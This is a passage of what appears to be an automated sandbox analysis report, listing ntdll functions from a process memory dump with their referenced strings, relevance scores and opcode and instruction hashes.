Instruction ID: 281af57c56491b5d924afa072c4849fafa0ff3ff46e930f6f0c2bca655f99376
Opcode Fuzzy Hash: fa1e205ffac7834bbee2bfcb4045fb43a7a71158e7d6c9fc46e1f2b9cd1dd9ed
Instruction Fuzzy Hash: 1041E572550305AFDB31EB69E884B5B77E8EF58A58F01492EF948D3264E774D800CB91

Function 0145C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON

Download Yara Rule

Strings

@, xrefs: 0145C1F1
PreferredUILanguages, xrefs: 0145C212
\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0145C1C5

Memory Dump Source

Source File: 0000000A.00000002.1660862435.0000000001370000.00000040.00001000.00020000.00000000.sdmp, Offset: 01370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1370000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
API String ID: 0-2968386058
Opcode ID: ddb83da768a69c47f2ca5bff5313c9946abc4c87753c630b2c39a0f9dd708ae4
Instruction ID: 7f8d4259f272a801a7d54d635142de412f152c78bc2613219627dd2ae3ef8b15
Opcode Fuzzy Hash: ddb83da768a69c47f2ca5bff5313c9946abc4c87753c630b2c39a0f9dd708ae4
Instruction Fuzzy Hash: 0B417475E00319EBDF51DBD8C881BEEB7BCAB14748F00406BFA05B7291D7749A448B50

Function 01434144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

LdrpResValidateFilePath Exit, xrefs: 01434172
@, xrefs: 01434225
LdrpResValidateFilePath Enter, xrefs: 01434160

Memory Dump Source

Source File: 0000000A.00000002.1660862435.0000000001370000.00000040.00001000.00020000.00000000.sdmp, Offset: 01370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1370000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
API String ID: 0-1373925480
Opcode ID: 4b1d75666e7493a5b7863b45cbd1439f7504fc6b243df503326380996a23731b
Instruction ID: dc0d2b4a9e3d43b764706e43a2255147fdd514c762bd8517d22c5dbbfd95e8e4
Opcode Fuzzy Hash: 4b1d75666e7493a5b7863b45cbd1439f7504fc6b243df503326380996a23731b
Instruction Fuzzy Hash: F541E231A046588BEB25DBE9C844BEEBBB4FF99344F18045BD901BB7A1D7748901CB50

Function 01424755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrredirect.c, xrefs: 01424899
LdrpCheckRedirection, xrefs: 0142488F
Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01424888

Memory Dump Source

Source File: 0000000A.00000002.1660862435.0000000001370000.00000040.00001000.00020000.00000000.sdmp, Offset: 01370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1370000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
API String ID: 0-3154609507
Opcode ID: 8e1aa6e130b4b0310fc70bf6d29f703731198b01806df23b33748bafa11bad17
Instruction ID: c86cf1fd66e0a52701d0e061722b8be9aa1e4c90c80960fd8423c1a7afd25a65
Opcode Fuzzy Hash: 8e1aa6e130b4b0310fc70bf6d29f703731198b01806df23b33748bafa11bad17
Instruction Fuzzy Hash: 9C41D036A102718BDB21CE69D840A27BBE4FF89A50B4A016FED58DB371D770D880CB81

Function 013B0BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 0140543E
(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size), xrefs: 01405449
HEAP[%wZ]: , xrefs: 01405431

Memory Dump Source

Source File: 0000000A.00000002.1660862435.0000000001370000.00000040.00001000.00020000.00000000.sdmp, Offset: 01370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1370000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-2558761708
Opcode ID: aabe7e9099423623d14ee491b6d745d17c8498b0c8a16dcd082c1edc161bf050
Instruction ID: 826b7ff48af34c3f6f022b2816c1808ae7891a4137a51f88ba4ec3cdfac674d1
Opcode Fuzzy Hash: aabe7e9099423623d14ee491b6d745d17c8498b0c8a16dcd082c1edc161bf050
Instruction Fuzzy Hash: E211C0313141069FDB2ECA19D484FBAB3A4EF50A1DF15817AF506CF6A1EB30D841CB51

Function 014220DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON

Download Yara Rule

Strings

Process initialization failed with status 0x%08lx, xrefs: 014220F3
LdrpInitializationFailure, xrefs: 014220FA
minkernel\ntdll\ldrinit.c, xrefs: 01422104

Memory Dump Source

Source File: 0000000A.00000002.1660862435.0000000001370000.00000040.00001000.00020000.00000000.sdmp, Offset: 01370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1370000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
API String ID: 0-2986994758
Opcode ID: 794497602d09e511081da55b0adb8a0101a4ba5533f68a1278f43e66b31016bc
Instruction ID: bab1d92e7cd13126de77d807cd5f12b2aaf2781792b14aa6cafd8e57b8813e39
Opcode Fuzzy Hash: 794497602d09e511081da55b0adb8a0101a4ba5533f68a1278f43e66b31016bc
Instruction Fuzzy Hash: 8DF0C875640318ABEB24EB4DDC56FAA3B68FB51B58F60005AFA0077395D2F0A540C691

Function 013B03E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 01404D8A

Strings

#%u, xrefs: 01404D82

Memory Dump Source

Source File: 0000000A.00000002.1660862435.0000000001370000.00000040.00001000.00020000.00000000.sdmp, Offset: 01370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1370000_ydJaT4b5N8.jbxd

Similarity

API ID: ___swprintf_l
String ID: #%u
API String ID: 48624451-232158463
Opcode ID: 4b9815a8270edd5f3dbc2cd0e2e8d5dc943d94795e9a01f150724aeaeffa7c73
Instruction ID: 599952f22f94ef4c29435c57f05e2bccdf9e6683ecca186ceff9801c35fd0304
Opcode Fuzzy Hash: 4b9815a8270edd5f3dbc2cd0e2e8d5dc943d94795e9a01f150724aeaeffa7c73
Instruction Fuzzy Hash: D3715E71A0011A9FDB05DF99C980BAEB7F8BF58304F144069EA05E76A1EA34ED41CB60

Function 013AA9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON

Download Yara Rule

Strings

LdrResSearchResource Enter, xrefs: 013AAA13
LdrResSearchResource Exit, xrefs: 013AAA25

Memory Dump Source

Source File: 0000000A.00000002.1660862435.0000000001370000.00000040.00001000.00020000.00000000.sdmp, Offset: 01370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1370000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
API String ID: 0-4066393604
Opcode ID: c64d6f6e14d6121a2530df5002d0c043add5ff969aba620ff92864d7bb06a136
Instruction ID: 5655c6362c9751c5ad9e146ad0c735e0b77af1c4d6ade7acfbd68de2910c8848
Opcode Fuzzy Hash: c64d6f6e14d6121a2530df5002d0c043add5ff969aba620ff92864d7bb06a136
Instruction Fuzzy Hash: D4E1A472E002199FEF22CF9DC994BAEBBB9FF08358F50042AE901E7291D7749941CB50

Function 0146A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON

Download Yara Rule

Strings

`, xrefs: 0146A551
`, xrefs: 0146A44B

Memory Dump Source

Source File: 0000000A.00000002.1660862435.0000000001370000.00000040.00001000.00020000.00000000.sdmp, Offset: 01370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1370000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction ID: 648e1b9a3e54183ad85d1353e9073edad822819dc0bf0240abe1de59a41accb7
Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction Fuzzy Hash: 83C1D5312047429BE724CF28C845B6BBBE9AFD431CF284A2EF695972A0D774D905CB52

Function 0141E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON

Download Yara Rule

Strings

UEFI, xrefs: 0141E751
Legacy, xrefs: 0141E75A

Memory Dump Source

Source File: 0000000A.00000002.1660862435.0000000001370000.00000040.00001000.00020000.00000000.sdmp, Offset: 01370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1370000_ydJaT4b5N8.jbxd

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: d187c21028e5ef644eaf463f894f9d8cde3c951d9c5b7e308e066b0f58b2a2c2
Instruction ID: 0ac737f6138a1550e897bfb247246f8c3b6c54191121958186263af95020f815
Opcode Fuzzy Hash: d187c21028e5ef644eaf463f894f9d8cde3c951d9c5b7e308e066b0f58b2a2c2
Instruction Fuzzy Hash: BE617F75E003199FEB15DFA8C840BAEBBB5FB48704F14402EEA59EB2A5D731E941CB50

Function 014443D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON

Download Yara Rule

Strings

@, xrefs: 01444437
MUI, xrefs: 01444525

Memory Dump Source

Source File: 0000000A.00000002.1660862435.0000000001370000.00000040.00001000.00020000.00000000.sdmp, Offset: 01370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1370000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID: @$MUI
API String ID: 0-17815947
Opcode ID: 3b9f9af910f556a5a86f141fb2891514e47dac3930848019b43a76b4c5c9e719
Instruction ID: 1eb5d7a79b8532cb825e4f110057e956a9d8eba3830aa198fd9a6e9fed38b5da
Opcode Fuzzy Hash: 3b9f9af910f556a5a86f141fb2891514e47dac3930848019b43a76b4c5c9e719
Instruction Fuzzy Hash: 3D510971D0021DAFEF11DFA9CC84BEFBBBDEB44658F14052AE615A7290D6709905CBA0

Function 013A04E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON

Download Yara Rule

Strings

kLsE, xrefs: 013A0540
TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 013A063D

Memory Dump Source

Source File: 0000000A.00000002.1660862435.0000000001370000.00000040.00001000.00020000.00000000.sdmp, Offset: 01370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1370000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
API String ID: 0-2547482624
Opcode ID: 82b9ce914a3f2038195b4ab608e350da8f336894a8933e553b6b60954e6a311c
Instruction ID: c099c64c57a788057f13a90612c6dc75e163b949ceeac46a3c505469c2c16c31
Opcode Fuzzy Hash: 82b9ce914a3f2038195b4ab608e350da8f336894a8933e553b6b60954e6a311c
Instruction Fuzzy Hash: 4951BD716047428BD728EF68C4846A7BBE4EF8431CF50483EFAEA87251E774E545CB92

Function 013AA2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON

Download Yara Rule

Strings

RtlpResUltimateFallbackInfo Enter, xrefs: 013AA2FB
RtlpResUltimateFallbackInfo Exit, xrefs: 013AA309

Memory Dump Source

Source File: 0000000A.00000002.1660862435.0000000001370000.00000040.00001000.00020000.00000000.sdmp, Offset: 01370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1370000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
API String ID: 0-2876891731
Opcode ID: d30c1fd22c550715debbf1f370fbee6c4a14e2485c5dbe91e6701762819e497d
Instruction ID: c7c2a4654581e7fc360b19598b7abb72db3f0d164192870902782d024ff316bf
Opcode Fuzzy Hash: d30c1fd22c550715debbf1f370fbee6c4a14e2485c5dbe91e6701762819e497d
Instruction Fuzzy Hash: A041A132A04659DBEB16CF5AC844F6A7BB4FF44708F5440AAD900DB7E1E3B5D940CB50

Function 013DA5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON

Download Yara Rule

Strings

Cleanup Group, xrefs: 013DA5E4
Threadpool!, xrefs: 013DA5E9

Memory Dump Source

Source File: 0000000A.00000002.1660862435.0000000001370000.00000040.00001000.00020000.00000000.sdmp, Offset: 01370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1370000_ydJaT4b5N8.jbxd

Similarity

API ID: InitializeThunk
String ID: Cleanup Group$Threadpool!
API String ID: 2994545307-4008356553
Opcode ID: e527d9ee278980641094eed1519b8af6ec5ab33d30d03d4ba59bf7a7577db3ac
Instruction ID: e1058edc3e46115ae10ecc06f354211020b5db87538365c6a432b02a3d23a113
Opcode Fuzzy Hash: e527d9ee278980641094eed1519b8af6ec5ab33d30d03d4ba59bf7a7577db3ac
Instruction Fuzzy Hash: C601D1B3254704EFE321DF24DE45B2677E8E795729F058939A65CC7190E374D804CB46

Function 013AC7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON

Download Yara Rule

Strings

MUI, xrefs: 013AC8C3, 013ACA40

Memory Dump Source

Source File: 0000000A.00000002.1660862435.0000000001370000.00000040.00001000.00020000.00000000.sdmp, Offset: 01370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1370000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID: MUI
API String ID: 0-1339004836
Opcode ID: 9c2bf121cd9b849170fd34d8377ba31b23cbd670997c118b796727c874ada404
Instruction ID: 73e2e783cbc3087a2ad973411e5c6e9ce4969f370b7940f635c6f45c55e54dd1
Opcode Fuzzy Hash: 9c2bf121cd9b849170fd34d8377ba31b23cbd670997c118b796727c874ada404
Instruction Fuzzy Hash: 13827A75E002188FEB25CFA9C880BEDBBB5FF48318F548169E959AB791DB309D41CB50

Function 01426420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON

Download Yara Rule

Strings

, xrefs: 014265C1

Memory Dump Source

Source File: 0000000A.00000002.1660862435.0000000001370000.00000040.00001000.00020000.00000000.sdmp, Offset: 01370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1370000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 6bd8ccd6afd61c2b148d9d22acc729b3e8d4566e193cbbff9e4935b0149f30fe
Instruction ID: 1f08f1748080c0154a0c1706646769efdb69f1d2ecd38364ad64b518dde90cf4
Opcode Fuzzy Hash: 6bd8ccd6afd61c2b148d9d22acc729b3e8d4566e193cbbff9e4935b0149f30fe
Instruction Fuzzy Hash: 24916471900229AFDB21DF99CC85FAE7BB8EF14B54F514056FA04AB1A0D674AD40CB50

Function 0144E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON

Download Yara Rule

Strings

, xrefs: 0144E1FA

Memory Dump Source

Source File: 0000000A.00000002.1660862435.0000000001370000.00000040.00001000.00020000.00000000.sdmp, Offset: 01370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1370000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 7874f3462b36acefc1b7ccd098239ddc3aaa8cabf41ba295f3066df751ce980f
Instruction ID: 2a6a9d8447880d4227f8876e610acc134c0f9ff4dff13b802342478157a87e54
Opcode Fuzzy Hash: 7874f3462b36acefc1b7ccd098239ddc3aaa8cabf41ba295f3066df751ce980f
Instruction Fuzzy Hash: 11916172900615BFEB229BA9DC84FEFBBB9FF45754F10001AF605A7260E7799902CB50

Function 013DA660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON

Download Yara Rule

Strings

GlobalTags, xrefs: 014167C9

Memory Dump Source

Source File: 0000000A.00000002.1660862435.0000000001370000.00000040.00001000.00020000.00000000.sdmp, Offset: 01370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1370000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID: GlobalTags
API String ID: 0-1106856819
Opcode ID: 0bed1219ce721b4ee6bccaacda9b9841ce4475380a792332e2a9a85a87dc6cbd
Instruction ID: 69c7d88e821b776a53121fddd3d784f2e825b367930c13fd0965a63a46901961
Opcode Fuzzy Hash: 0bed1219ce721b4ee6bccaacda9b9841ce4475380a792332e2a9a85a87dc6cbd
Instruction Fuzzy Hash: 92718DB5E0120ACFDF28CF9CD5806AEBBB1BF58714F15812EE915A7368E7B19801CB50

Function 01444978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON

Download Yara Rule

Strings

.mui, xrefs: 01444A7F

Memory Dump Source

Source File: 0000000A.00000002.1660862435.0000000001370000.00000040.00001000.00020000.00000000.sdmp, Offset: 01370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1370000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID: .mui
API String ID: 0-1199573805
Opcode ID: 4dccec54b629480e7a43a20e44490dccf92eab7d72289e9b78c92dee0da4e2f8
Instruction ID: b2284753c216f97638f4aedcecee768c67a42fc68d14836e347e6b3c82860e70
Opcode Fuzzy Hash: 4dccec54b629480e7a43a20e44490dccf92eab7d72289e9b78c92dee0da4e2f8
Instruction Fuzzy Hash: 93518672D002299BEF15DF9DD840BAEBBB8AF14654F09416AEA11B7360D7349D01CBE4

Function 013BE627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON

Download Yara Rule

Strings

EXT-, xrefs: 013BE6A4

Memory Dump Source

Source File: 0000000A.00000002.1660862435.0000000001370000.00000040.00001000.00020000.00000000.sdmp, Offset: 01370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1370000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID: EXT-
API String ID: 0-1948896318
Opcode ID: 5e9fc6f5136e168d3708509a71daaaf06045783de7f6625b3536251faa5b8f6d
Instruction ID: 5280e664640cbb98fe3087002151d86bc2d7c7b8a833a9b0a68b9e4566f00c83
Opcode Fuzzy Hash: 5e9fc6f5136e168d3708509a71daaaf06045783de7f6625b3536251faa5b8f6d
Instruction Fuzzy Hash: 40417072508356ABD721DA7DC881BEBB7ECAF8861CF44093DF684D7580F674D9048792

Function 0141C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON

Download Yara Rule

Strings

BinaryHash, xrefs: 0141C77F

Memory Dump Source

Source File: 0000000A.00000002.1660862435.0000000001370000.00000040.00001000.00020000.00000000.sdmp, Offset: 01370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1370000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: ba9b8565613ce18f9fad9e104517e29cf5cb901360f62bc6db144467499b1f62
Instruction ID: a3825a3b492f09e7a46e4495b12640df2d2208c43a9aa5596ce8118e023c7a9c
Opcode Fuzzy Hash: ba9b8565613ce18f9fad9e104517e29cf5cb901360f62bc6db144467499b1f62
Instruction Fuzzy Hash: F44133B1D4022DAADF21DA54CCC4FDEB77CAB54718F0045E6EB08AB154DB709E898FA4

Function 01436B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON

Download Yara Rule

Strings

#, xrefs: 01436B91

Memory Dump Source

Source File: 0000000A.00000002.1660862435.0000000001370000.00000040.00001000.00020000.00000000.sdmp, Offset: 01370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1370000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: e405d665aaa7d80cfde33406be61f1e00fced994c311d850112796524b7d3f28
Instruction ID: bca230468abed8e3b29c25aacf54f4b455d1951d4d30c2ef086006a42f1a6e71
Opcode Fuzzy Hash: e405d665aaa7d80cfde33406be61f1e00fced994c311d850112796524b7d3f28
Instruction Fuzzy Hash: A4311A31A0071ABBDB32CB6DC854BEE7BB8DF88704F15406AEA409B292D775DE05CB50

Function 0141CA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON

Download Yara Rule

Strings

BinaryName, xrefs: 0141CAA2

Memory Dump Source

Source File: 0000000A.00000002.1660862435.0000000001370000.00000040.00001000.00020000.00000000.sdmp, Offset: 01370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1370000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID: BinaryName
API String ID: 0-215506332
Opcode ID: d21f7b73676104ac04fb2f9398723baaa35dae06455f691d32bd25b2c34926ff
Instruction ID: beb1a8326b5b671dc20f98a06b52ef043b136a93a5c8c5dbcd4c387283e8965f
Opcode Fuzzy Hash: d21f7b73676104ac04fb2f9398723baaa35dae06455f691d32bd25b2c34926ff
Instruction Fuzzy Hash: A2310536A4061AAFEB16DB5CDC85E6FBB74FB80750F01412AE905E7260D730AE04D7E0

Function 0142892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON

Download Yara Rule

Strings

AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0142895E

Memory Dump Source

Source File: 0000000A.00000002.1660862435.0000000001370000.00000040.00001000.00020000.00000000.sdmp, Offset: 01370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1370000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
API String ID: 0-702105204
Opcode ID: 2a4854510610efb10aad826253567d2527532170b7fd79d0d44c9c6d8efc7507
Instruction ID: cb30d34cfc59e2302c68e4ad568b1c105c1281e664f0bf8a4aea5dd5e24a68fd
Opcode Fuzzy Hash: 2a4854510610efb10aad826253567d2527532170b7fd79d0d44c9c6d8efc7507
Instruction Fuzzy Hash: CD01D4323002339BEB256F5AD884A6E7FA5EF91658B94042FE64106671CB3078C1CA96

Function 01442000 Relevance: .8, Instructions: 757COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1660862435.0000000001370000.00000040.00001000.00020000.00000000.sdmp, Offset: 01370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1370000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aaecc42cd6073e5485c2c8c5e4bdaf1efa1e44637ad747962e730665e73c977f
Instruction ID: 633ad6cace7fd048378097431dc3068e0b7ddc8ac79c06e2d878611d3a3f0648
Opcode Fuzzy Hash: aaecc42cd6073e5485c2c8c5e4bdaf1efa1e44637ad747962e730665e73c977f
Instruction Fuzzy Hash: BD42BF356083419BF725CF69D890E6FBBE5AF98304F08092EFA8697360D7B0D845CB52

Function 01438158 Relevance: .6, Instructions: 617COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1660862435.0000000001370000.00000040.00001000.00020000.00000000.sdmp, Offset: 01370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1370000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c7b547e6399ed79c1e65e40336dbfb4e3dca062a8460c1b6ea1a780db57369b
Instruction ID: 6bdf32cb93d9c5c422a597e64188e5f9a612c1481b05d3e8d104c32ebaee0781
Opcode Fuzzy Hash: 3c7b547e6399ed79c1e65e40336dbfb4e3dca062a8460c1b6ea1a780db57369b
Instruction Fuzzy Hash: C9425F75E0021A8FEB25CF69C841BAEFBF5BF88304F14819AE949AB351D7349985CF50

Function 013B2840 Relevance: .6, Instructions: 605COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1660862435.0000000001370000.00000040.00001000.00020000.00000000.sdmp, Offset: 01370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1370000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f0c089750d8b5d9e26acb7288b443db3e3b4950bc89d913986859eb3728e4c8
Instruction ID: cc5ffa95f4bd6801f82ef6e3a5a68331cca7295f4a7506b5b64626d052fd6cb8
Opcode Fuzzy Hash: 5f0c089750d8b5d9e26acb7288b443db3e3b4950bc89d913986859eb3728e4c8
Instruction Fuzzy Hash: 3132F070A007158FDB26CF6AC8447BEBBF2BF84304F15412ED54A9B7A4D735A922CB50

Function 0144A118 Relevance: .6, Instructions: 591COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1660862435.0000000001370000.00000040.00001000.00020000.00000000.sdmp, Offset: 01370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1370000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 262bc165738bb4b3b713661151a32de69cfcd21430c6881fc7c0df4ed20ecd64
Instruction ID: 71603650bbbcd91c15c1dd546b0a4ba1b22a81384c126f1a215cbc6dd6968fab
Opcode Fuzzy Hash: 262bc165738bb4b3b713661151a32de69cfcd21430c6881fc7c0df4ed20ecd64
Instruction Fuzzy Hash: 6022CC742846618BFB25CF29C094376BBF1AF44304F28845BE9878F3A6E735E442DB61

Function 013A6A50 Relevance: .5, Instructions: 548COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1660862435.0000000001370000.00000040.00001000.00020000.00000000.sdmp, Offset: 01370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1370000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 907a2535bea07ced2b5d5de886f406efab9b3dd0b09d08e00c17b18f983c60c8
Instruction ID: f59b23d86b5c194381f54b0cfdb09773e90b00ce5402e8e5f987515ed39c46fb
Opcode Fuzzy Hash: 907a2535bea07ced2b5d5de886f406efab9b3dd0b09d08e00c17b18f983c60c8
Instruction Fuzzy Hash: 8C32B2B1A00215CFDB25CF69C480BAEBBF5FF48304F58456AE956AB7A1D734E841CB90

Function 013C4A35 Relevance: .4, Instructions: 423COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1660862435.0000000001370000.00000040.00001000.00020000.00000000.sdmp, Offset: 01370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1370000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
Instruction ID: e1dd6c0c142c8092d93877be063b9918754c70e590af1aa340f6e9988d28abad
Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
Instruction Fuzzy Hash: 09F18E75E0020A9BDF15DF99C590BAEBBF5AF48B18F04812EE901AB351E774EC41CB50

Function 0143892B Relevance: .4, Instructions: 386COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1660862435.0000000001370000.00000040.00001000.00020000.00000000.sdmp, Offset: 01370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1370000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b517d7a07b1d826b1cacaa70f4ea4a6f24c087b28f09c4c00cf18708589f6bc
Instruction ID: a546b7cde411e96d0f1ded8012b45cdf2b3bbf9d98f3fdb097bd38a2eafbf7ae
Opcode Fuzzy Hash: 3b517d7a07b1d826b1cacaa70f4ea4a6f24c087b28f09c4c00cf18708589f6bc
Instruction Fuzzy Hash: F2D1E171A0060B8BDF19CF69C841AFFF7F1AFC8314F18826AE955A7251D735E9068B60

Function 013A65D0 Relevance: .4, Instructions: 383COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1660862435.0000000001370000.00000040.00001000.00020000.00000000.sdmp, Offset: 01370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1370000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73a875446c12a45b0af2d6a1e12b4504ea1f617078ae0f76bb656f4de27a977a
Instruction ID: 7da32f0e8006df133011cfd9525ecaa4c302da4e5364c24ab3851f61e25f3831
Opcode Fuzzy Hash: 73a875446c12a45b0af2d6a1e12b4504ea1f617078ae0f76bb656f4de27a977a
Instruction Fuzzy Hash: 58E181B1508341CFC715CF2CC491A6ABBE4FF89318F498A6DE99587351E731E905CB92

Function 01398397 Relevance: .4, Instructions: 380COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1660862435.0000000001370000.00000040.00001000.00020000.00000000.sdmp, Offset: 01370000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1370000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e00ec9d7a4f7b9450062c4ba5b4bb25fe9370b349f11544fdc0dbc7477f9bbc3
Instruction ID: 829bfc52268e556b8653d062dbe426a6ebeeb599409cb5d1ff4a0147a24c2cb0
Opcode Fuzzy Hash: e00ec9d7a4f7b9450062c4ba5b4bb25fe9370b349f11544fdc0dbc7477f9bbc3
Instruction Fuzzy Hash: 88D104B1A0020EDBDF14CF28C880ABEB7A9BF9571CF04466DEA16DB280E734D955CB50

Function 01428243 Relevance: .3, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

